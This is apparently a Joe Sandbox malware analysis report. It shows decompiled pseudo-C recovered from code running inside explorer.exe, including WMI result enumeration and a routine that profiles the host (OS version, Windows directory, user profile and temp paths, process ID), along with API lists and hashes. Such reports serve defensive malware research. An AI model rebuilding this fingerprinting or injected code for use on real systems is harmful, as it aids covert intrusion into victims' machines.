							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E007A8BF4(_t136, 0);
								E007A8BF4( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E007A98BD(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E007A9DF2(_t281, 0xb28);
								 *_t329 = 0x83f;
								_t217 = E007A9DF2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E007A8BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E007A8BAF( &_v92);
											E007A8BAF( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E007A9E51();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E007A8BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E007A9DF2(_t283, 0xe0a);
										E007A9E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E007A8BAF( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E007A98BD(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E007AE92E( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E007A8BF4( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                                                                                                                                                                        0x007aea53
                                                                                                                                                                        0x007aea59
                                                                                                                                                                        0x007aea60
                                                                                                                                                                        0x007aea63
                                                                                                                                                                        0x007aea66
                                                                                                                                                                        0x007aea6b
                                                                                                                                                                        0x007aea6d
                                                                                                                                                                        0x007aea72
                                                                                                                                                                        0x007aeeba
                                                                                                                                                                        0x007aeeba
                                                                                                                                                                        0x007aea7f
                                                                                                                                                                        0x007aea81
                                                                                                                                                                        0x007aea84
                                                                                                                                                                        0x007aea87
                                                                                                                                                                        0x007aee9f
                                                                                                                                                                        0x007aeea5
                                                                                                                                                                        0x007aeeaf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeeb4
                                                                                                                                                                        0x007aea92
                                                                                                                                                                        0x007aea99
                                                                                                                                                                        0x007aeaa0
                                                                                                                                                                        0x007aeaa3
                                                                                                                                                                        0x007aeaa8
                                                                                                                                                                        0x007aeaaa
                                                                                                                                                                        0x007aeaad
                                                                                                                                                                        0x007aeab0
                                                                                                                                                                        0x007aeab1
                                                                                                                                                                        0x007aeaba
                                                                                                                                                                        0x007aeac0
                                                                                                                                                                        0x007aeac3
                                                                                                                                                                        0x007aeacc
                                                                                                                                                                        0x007aead1
                                                                                                                                                                        0x007aead6
                                                                                                                                                                        0x007aeaed
                                                                                                                                                                        0x007aeafa
                                                                                                                                                                        0x007aeafd
                                                                                                                                                                        0x007aeb04
                                                                                                                                                                        0x007aeb09
                                                                                                                                                                        0x007aeb10
                                                                                                                                                                        0x007aeb15
                                                                                                                                                                        0x007aeb1c
                                                                                                                                                                        0x007aeb1e
                                                                                                                                                                        0x007aeb2a
                                                                                                                                                                        0x007aeb2d
                                                                                                                                                                        0x007aeb2f
                                                                                                                                                                        0x007aee8f
                                                                                                                                                                        0x007aee90
                                                                                                                                                                        0x007aee99
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aee99
                                                                                                                                                                        0x007aeb35
                                                                                                                                                                        0x007aeb38
                                                                                                                                                                        0x007aeb3b
                                                                                                                                                                        0x007aeb3e
                                                                                                                                                                        0x007aeb40
                                                                                                                                                                        0x007aee5b
                                                                                                                                                                        0x007aee5e
                                                                                                                                                                        0x007aee61
                                                                                                                                                                        0x007aee63
                                                                                                                                                                        0x007aee85
                                                                                                                                                                        0x007aee8a
                                                                                                                                                                        0x007aee65
                                                                                                                                                                        0x007aee68
                                                                                                                                                                        0x007aee73
                                                                                                                                                                        0x007aee7a
                                                                                                                                                                        0x007aee7a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeb46
                                                                                                                                                                        0x007aeb46
                                                                                                                                                                        0x007aeb58
                                                                                                                                                                        0x007aeb5b
                                                                                                                                                                        0x007aeb5d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeb65
                                                                                                                                                                        0x007aeb68
                                                                                                                                                                        0x007aeb6b
                                                                                                                                                                        0x007aeb6e
                                                                                                                                                                        0x007aeb71
                                                                                                                                                                        0x007aeb74
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeb7a
                                                                                                                                                                        0x007aeb88
                                                                                                                                                                        0x007aeb8b
                                                                                                                                                                        0x007aeb8d
                                                                                                                                                                        0x007aeba6
                                                                                                                                                                        0x007aebb5
                                                                                                                                                                        0x007aebbd
                                                                                                                                                                        0x007aebbd
                                                                                                                                                                        0x007aebc0
                                                                                                                                                                        0x007aebc7
                                                                                                                                                                        0x007aebcb
                                                                                                                                                                        0x007aebd1
                                                                                                                                                                        0x007aebd3
                                                                                                                                                                        0x007aee43
                                                                                                                                                                        0x007aee49
                                                                                                                                                                        0x007aee4f
                                                                                                                                                                        0x007aee52
                                                                                                                                                                        0x007aee52
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aee52
                                                                                                                                                                        0x007aebe2
                                                                                                                                                                        0x007aebf6
                                                                                                                                                                        0x007aebfa
                                                                                                                                                                        0x007aebfc
                                                                                                                                                                        0x007aec01
                                                                                                                                                                        0x007aee10
                                                                                                                                                                        0x007aee16
                                                                                                                                                                        0x007aee21
                                                                                                                                                                        0x007aee2c
                                                                                                                                                                        0x007aee32
                                                                                                                                                                        0x007aee38
                                                                                                                                                                        0x007aee3b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aee3b
                                                                                                                                                                        0x007aec07
                                                                                                                                                                        0x007aedde
                                                                                                                                                                        0x007aedde
                                                                                                                                                                        0x007aede1
                                                                                                                                                                        0x007aede4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aec0f
                                                                                                                                                                        0x007aec17
                                                                                                                                                                        0x007aec1e
                                                                                                                                                                        0x007aec24
                                                                                                                                                                        0x007aec26
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aec2f
                                                                                                                                                                        0x007aec44
                                                                                                                                                                        0x007aec4a
                                                                                                                                                                        0x007aec53
                                                                                                                                                                        0x007aec56
                                                                                                                                                                        0x007aec59
                                                                                                                                                                        0x007aec5b
                                                                                                                                                                        0x007aedd1
                                                                                                                                                                        0x007aedd4
                                                                                                                                                                        0x007aeddd
                                                                                                                                                                        0x007aeddd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeddd
                                                                                                                                                                        0x007aec6b
                                                                                                                                                                        0x007aec6e
                                                                                                                                                                        0x007aec75
                                                                                                                                                                        0x007aec7b
                                                                                                                                                                        0x007aec7e
                                                                                                                                                                        0x007aec81
                                                                                                                                                                        0x007aec84
                                                                                                                                                                        0x007aec87
                                                                                                                                                                        0x007aecc3
                                                                                                                                                                        0x007aecc3
                                                                                                                                                                        0x007aecc6
                                                                                                                                                                        0x007aed72
                                                                                                                                                                        0x007aed86
                                                                                                                                                                        0x007aed96
                                                                                                                                                                        0x007aed9a
                                                                                                                                                                        0x007aed9c
                                                                                                                                                                        0x007aedb3
                                                                                                                                                                        0x007aedb7
                                                                                                                                                                        0x007aedc0
                                                                                                                                                                        0x007aedcb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aedcb
                                                                                                                                                                        0x007aeda2
                                                                                                                                                                        0x007aeda3
                                                                                                                                                                        0x007aeda8
                                                                                                                                                                        0x007aeda8
                                                                                                                                                                        0x007aedaa
                                                                                                                                                                        0x007aedab
                                                                                                                                                                        0x007aedb0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aedb0
                                                                                                                                                                        0x007aeccc
                                                                                                                                                                        0x007aeccc
                                                                                                                                                                        0x007aeccf
                                                                                                                                                                        0x007aed3a
                                                                                                                                                                        0x007aed4e
                                                                                                                                                                        0x007aed5e
                                                                                                                                                                        0x007aed62
                                                                                                                                                                        0x007aed64
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aed6a
                                                                                                                                                                        0x007aed6b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aed6b
                                                                                                                                                                        0x007aecd1
                                                                                                                                                                        0x007aecd1
                                                                                                                                                                        0x007aecd4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aecd6
                                                                                                                                                                        0x007aecd9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aecdb
                                                                                                                                                                        0x007aecdb
                                                                                                                                                                        0x007aece1
                                                                                                                                                                        0x007aecfd
                                                                                                                                                                        0x007aed0c
                                                                                                                                                                        0x007aed15
                                                                                                                                                                        0x007aed1a
                                                                                                                                                                        0x007aed1d
                                                                                                                                                                        0x007aed23
                                                                                                                                                                        0x007aed23
                                                                                                                                                                        0x007aed28
                                                                                                                                                                        0x007aed34
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aed34
                                                                                                                                                                        0x007aece6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aece6
                                                                                                                                                                        0x007aec89
                                                                                                                                                                        0x007aecb0
                                                                                                                                                                        0x007aecb5
                                                                                                                                                                        0x007aecba
                                                                                                                                                                        0x007aecbc
                                                                                                                                                                        0x007aecbc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aecba
                                                                                                                                                                        0x007aec8b
                                                                                                                                                                        0x007aec8b
                                                                                                                                                                        0x007aec8e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aec94
                                                                                                                                                                        0x007aec94
                                                                                                                                                                        0x007aec97
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aec9d
                                                                                                                                                                        0x007aec9d
                                                                                                                                                                        0x007aeca0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeca6
                                                                                                                                                                        0x007aeca9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aecab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aecab
                                                                                                                                                                        0x007aeded
                                                                                                                                                                        0x007aedf3
                                                                                                                                                                        0x007aedf9
                                                                                                                                                                        0x007aedfc
                                                                                                                                                                        0x007aedff
                                                                                                                                                                        0x007aedff
                                                                                                                                                                        0x007aee02
                                                                                                                                                                        0x007aee03
                                                                                                                                                                        0x007aee06
                                                                                                                                                                        0x007aee08
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aee58
                                                                                                                                                                        0x007aee58
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aee58
                                                                                                                                                                        0x007aeb8f
                                                                                                                                                                        0x007aeb95
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeb95
                                                                                                                                                                        0x007aee55
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aead8
                                                                                                                                                                        0x007aeadd
                                                                                                                                                                        0x007aeae2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aeae6

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007AE400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE413
                                                                                                                                                                          • Part of subcall function 007AE400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE424
                                                                                                                                                                          • Part of subcall function 007AE400: CoCreateInstance.OLE32(007BC868,00000000,00000001,007BC878,?,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE43B
                                                                                                                                                                          • Part of subcall function 007AE400: SysAllocString.OLEAUT32(00000000), ref: 007AE446
                                                                                                                                                                          • Part of subcall function 007AE400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,007AE731,000009DA,00000000,?,00000000), ref: 007AE471
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007AEAF3
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 007AEB07
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007AEE90
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007AEE99
                                                                                                                                                                          • Part of subcall function 007A8BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 007A8C3A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                        • String ID: FALSE$TRUE
                                                                                                                                                                        • API String ID: 1290676130-1412513891
                                                                                                                                                                        • Opcode ID: 79d4038f6a510713a32cb1dd4923de1663421fdffb7003722fd23708bb1214e7
                                                                                                                                                                        • Instruction ID: c4f2abf719a32e4c2046ef4cebb130f7f3372d7786eab4f1a3500a51a5f93e68
                                                                                                                                                                        • Opcode Fuzzy Hash: 79d4038f6a510713a32cb1dd4923de1663421fdffb7003722fd23708bb1214e7
                                                                                                                                                                        • Instruction Fuzzy Hash: 4EE16371E00219EFDB14DFE4C889EEEBBB9FF89300F148659E515A7255DB38A901CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007ADF3D Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 250COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                        			E007ADF3D(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t87;
				intOrPtr _t89;
				void* _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x7bf830; // 0x7a0000
				_t68 = E007A8BDE(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x7bf818; // 0xeaf6c8
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E007B3548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x7bf818; // 0xeaf6c8
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E007A95F3(_t194, _t207);
					}
					_t75 =  *0x7bf818; // 0xeaf6c8
					_t77 = E007AC879( *((intOrPtr*)(_t75 + 0x12c))());
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E007AC9F4( *_t77) == 0) {
						_t79 = E007AC8C9(_t159, _t194);
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220
					 *((intOrPtr*)(_t192 + 0x218)) = E007AF3A3(_t14);
					 *((intOrPtr*)(_t192 + 0x21c)) = E007AF368(_t14);
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x7bf820; // 0xeaf8b8
					_push(0);
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t89 =  *0x7bf828; // 0xeaf838
					_t90 =  *((intOrPtr*)(_t89 + 0x3c))(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E007ADF36(_t149);
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E007A95F3(_t149, _t211);
					}
					_t92 = E007AC6CE();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E007AC4C1(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E007A99DF(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E007A960D(_t149, _t36);
					_t97 = E007AE2C5(_t196, E007AA43D(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E007AC6E4(_t97, _t37, _t216);
					_t99 =  *0x7bf818; // 0xeaf6c8
					 *((intOrPtr*)(_t192 + 0x101c)) = E007ACA46( *((intOrPtr*)(_t99 + 0x12c))(_t195));
					E007A8D6D(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E007ADD39(_t100);
					_t106 = E007ADD62(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E007A9DF2(_t105, 0x9cf);
					_t177 =  *0x7bf818; // 0xeaf6c8
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E007A8BAF( &_v8);
					_t113 =  *0x7bf818; // 0xeaf6c8
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E007A9E51(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x7bf818; // 0xeaf6c8
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x7bf818; // 0xeaf6c8
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x7bf818; // 0xeaf6c8
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x7bf818; // 0xeaf6c8
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x7bf818; // 0xeaf6c8
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E007B3548(E007AE2C5(_t62, E007AA43D(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E007B351A( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E007A96DA(_t66, _t191);
					 *((intOrPtr*)(_t192 + 0x1898)) = E007ADAE3(_t191);
					return _t192;
				}
				return _t68;
			}




















































                                                                                                                                                                        0x007adf3d
                                                                                                                                                                        0x007adf47
                                                                                                                                                                        0x007adf53
                                                                                                                                                                        0x007adf58
                                                                                                                                                                        0x007adf5d
                                                                                                                                                                        0x007adf6a
                                                                                                                                                                        0x007adf70
                                                                                                                                                                        0x007adf75
                                                                                                                                                                        0x007adf7b
                                                                                                                                                                        0x007adf8b
                                                                                                                                                                        0x007adf90
                                                                                                                                                                        0x007adf95
                                                                                                                                                                        0x007adf95
                                                                                                                                                                        0x007adfa5
                                                                                                                                                                        0x007adfab
                                                                                                                                                                        0x007adfad
                                                                                                                                                                        0x007adfb6
                                                                                                                                                                        0x007adfb6
                                                                                                                                                                        0x007adfbc
                                                                                                                                                                        0x007adfc9
                                                                                                                                                                        0x007adfce
                                                                                                                                                                        0x007adfd4
                                                                                                                                                                        0x007adfdd
                                                                                                                                                                        0x007adfeb
                                                                                                                                                                        0x007adff2
                                                                                                                                                                        0x007adff7
                                                                                                                                                                        0x007adff7
                                                                                                                                                                        0x007adff8
                                                                                                                                                                        0x007adfdf
                                                                                                                                                                        0x007adfdf
                                                                                                                                                                        0x007adfdf
                                                                                                                                                                        0x007adffe
                                                                                                                                                                        0x007ae009
                                                                                                                                                                        0x007ae014
                                                                                                                                                                        0x007ae01a
                                                                                                                                                                        0x007ae01a
                                                                                                                                                                        0x007ae023
                                                                                                                                                                        0x007ae029
                                                                                                                                                                        0x007ae02d
                                                                                                                                                                        0x007ae034
                                                                                                                                                                        0x007ae03b
                                                                                                                                                                        0x007ae042
                                                                                                                                                                        0x007ae046
                                                                                                                                                                        0x007ae04d
                                                                                                                                                                        0x007ae04e
                                                                                                                                                                        0x007ae050
                                                                                                                                                                        0x007ae055
                                                                                                                                                                        0x007ae05c
                                                                                                                                                                        0x007ae05e
                                                                                                                                                                        0x007ae05e
                                                                                                                                                                        0x007ae064
                                                                                                                                                                        0x007ae06e
                                                                                                                                                                        0x007ae073
                                                                                                                                                                        0x007ae073
                                                                                                                                                                        0x007ae080
                                                                                                                                                                        0x007ae086
                                                                                                                                                                        0x007ae08b
                                                                                                                                                                        0x007ae08d
                                                                                                                                                                        0x007ae096
                                                                                                                                                                        0x007ae096
                                                                                                                                                                        0x007ae09e
                                                                                                                                                                        0x007ae0a3
                                                                                                                                                                        0x007ae0a3
                                                                                                                                                                        0x007ae0a9
                                                                                                                                                                        0x007ae0b4
                                                                                                                                                                        0x007ae0b9
                                                                                                                                                                        0x007ae0c1
                                                                                                                                                                        0x007ae0c7
                                                                                                                                                                        0x007ae0cf
                                                                                                                                                                        0x007ae0e1
                                                                                                                                                                        0x007ae0e7
                                                                                                                                                                        0x007ae0ef
                                                                                                                                                                        0x007ae0f4
                                                                                                                                                                        0x007ae112
                                                                                                                                                                        0x007ae118
                                                                                                                                                                        0x007ae11d
                                                                                                                                                                        0x007ae120
                                                                                                                                                                        0x007ae123
                                                                                                                                                                        0x007ae130
                                                                                                                                                                        0x007ae136
                                                                                                                                                                        0x007ae140
                                                                                                                                                                        0x007ae140
                                                                                                                                                                        0x007ae146
                                                                                                                                                                        0x007ae14e
                                                                                                                                                                        0x007ae159
                                                                                                                                                                        0x007ae15e
                                                                                                                                                                        0x007ae164
                                                                                                                                                                        0x007ae166
                                                                                                                                                                        0x007ae173
                                                                                                                                                                        0x007ae174
                                                                                                                                                                        0x007ae175
                                                                                                                                                                        0x007ae180
                                                                                                                                                                        0x007ae182
                                                                                                                                                                        0x007ae189
                                                                                                                                                                        0x007ae189
                                                                                                                                                                        0x007ae193
                                                                                                                                                                        0x007ae198
                                                                                                                                                                        0x007ae19d
                                                                                                                                                                        0x007ae19d
                                                                                                                                                                        0x007ae1a3
                                                                                                                                                                        0x007ae1aa
                                                                                                                                                                        0x007ae1ab
                                                                                                                                                                        0x007ae1b8
                                                                                                                                                                        0x007ae1cb
                                                                                                                                                                        0x007ae1d0
                                                                                                                                                                        0x007ae1d5
                                                                                                                                                                        0x007ae1de
                                                                                                                                                                        0x007ae1de
                                                                                                                                                                        0x007ae1e4
                                                                                                                                                                        0x007ae1e9
                                                                                                                                                                        0x007ae1ef
                                                                                                                                                                        0x007ae1f5
                                                                                                                                                                        0x007ae1fa
                                                                                                                                                                        0x007ae203
                                                                                                                                                                        0x007ae205
                                                                                                                                                                        0x007ae20c
                                                                                                                                                                        0x007ae20c
                                                                                                                                                                        0x007ae212
                                                                                                                                                                        0x007ae21a
                                                                                                                                                                        0x007ae21f
                                                                                                                                                                        0x007ae220
                                                                                                                                                                        0x007ae225
                                                                                                                                                                        0x007ae22e
                                                                                                                                                                        0x007ae230
                                                                                                                                                                        0x007ae23b
                                                                                                                                                                        0x007ae23b
                                                                                                                                                                        0x007ae244
                                                                                                                                                                        0x007ae24c
                                                                                                                                                                        0x007ae253
                                                                                                                                                                        0x007ae258
                                                                                                                                                                        0x007ae267
                                                                                                                                                                        0x007ae27f
                                                                                                                                                                        0x007ae286
                                                                                                                                                                        0x007ae294
                                                                                                                                                                        0x007ae29f
                                                                                                                                                                        0x007ae2a0
                                                                                                                                                                        0x007ae2a4
                                                                                                                                                                        0x007ae2aa
                                                                                                                                                                        0x007ae2ab
                                                                                                                                                                        0x007ae2b8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007ae2c0
                                                                                                                                                                        0x007ae2c4

                                                                                                                                                                        APIs
